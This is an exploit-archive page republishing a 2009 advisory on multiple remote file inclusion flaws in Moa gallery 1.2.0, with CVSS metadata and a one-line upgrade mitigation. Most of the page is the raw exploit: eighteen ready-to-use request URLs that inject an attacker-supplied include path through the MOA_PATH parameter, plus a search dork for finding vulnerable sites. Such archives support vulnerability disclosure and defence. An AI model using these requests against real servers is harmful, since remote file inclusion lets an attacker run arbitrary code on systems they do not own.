header-logo
Suggest Exploit
vendor:
Moa gallery
by:
cr4wl3r
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Moa gallery
Affected Version From: 1.2.0
Affected Version To: 1.2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:moagallery:moa_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Moa gallery <= 1.2.0 Multiple Remote File Include Vulnerability

Moa gallery version 1.2.0 and prior are vulnerable to multiple remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of Moa gallery.
Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
######################################################################
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
**********************************************************************
######################################################################
#[x] Moa gallery <= 1.2.0 Multiple Remote File Include Vulnerability                    	  
#[!] Download             :  http://sourceforge.net/projects/moagallery/files/                      		  
#[!] Author               :  cr4wl3r                                   		  
#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org              		  
#[!] Location             :  Gorontalo - INDONESIA                     		  
#[!] Dork                 :  "Tanyakan Pada Rumput Yang Bergoyang"     		  
######################################################################

[x] 3xplo!t :                                                         		  
                                                                                  
http://localhost/[path]/sources/_error_funcs.php?MOA_PATH=[AvriLhea]
http://localhost/[path]/sources/_integrity_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_gallery.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_parser.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_gallery_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_image_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_upgrade_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_user_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_view_full.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_login.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_sitemap.php?MOA_PATH=[AvriLhea]          

######################################################################
#[!] Greetz : MyMom [alm]  
#                                                                        
#[!] Special Thanks : str0ke, google, All MusLiM HacKers  
#
#[!] Thanks 2 : Irvian, xoron
#
#[!] SeLamaT MenuNaiKan IbaDah PuaSa RaMadHan 1430H                                              
######################################################################
**********************************************************************
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
######################################################################
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

# milw0rm.com [2009-08-26]

Navigation

Suggest Exploit

Services By CQR